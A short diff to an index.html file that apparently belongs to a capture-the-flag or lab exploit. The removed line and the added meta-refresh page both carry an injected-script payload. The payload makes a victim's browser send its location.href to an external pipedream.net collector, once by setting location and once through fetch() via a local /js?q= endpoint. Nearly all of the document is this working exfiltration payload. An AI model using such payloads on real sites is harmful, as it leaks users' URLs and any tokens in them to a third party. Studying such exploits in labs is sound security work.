--- a/index.html
+++ b/index.html
@@ -1,1 +1,9 @@
-<script src="/js?q=location='https://eo62lwd3xgz14zy.m.pipedream.net/?'%2Blocation.href"></script>
+<!DOCTYPE html>
+<html>
+<head>
+    <meta http-equiv="refresh" content="0;url=http://127.0.0.1:5000/js?q=fetch('https://eo62lwd3xgz14zy.m.pipedream.net/?'%2Blocation.href)">
+</head>
+<body>
+    Redirecting...
+</body>
+</html>
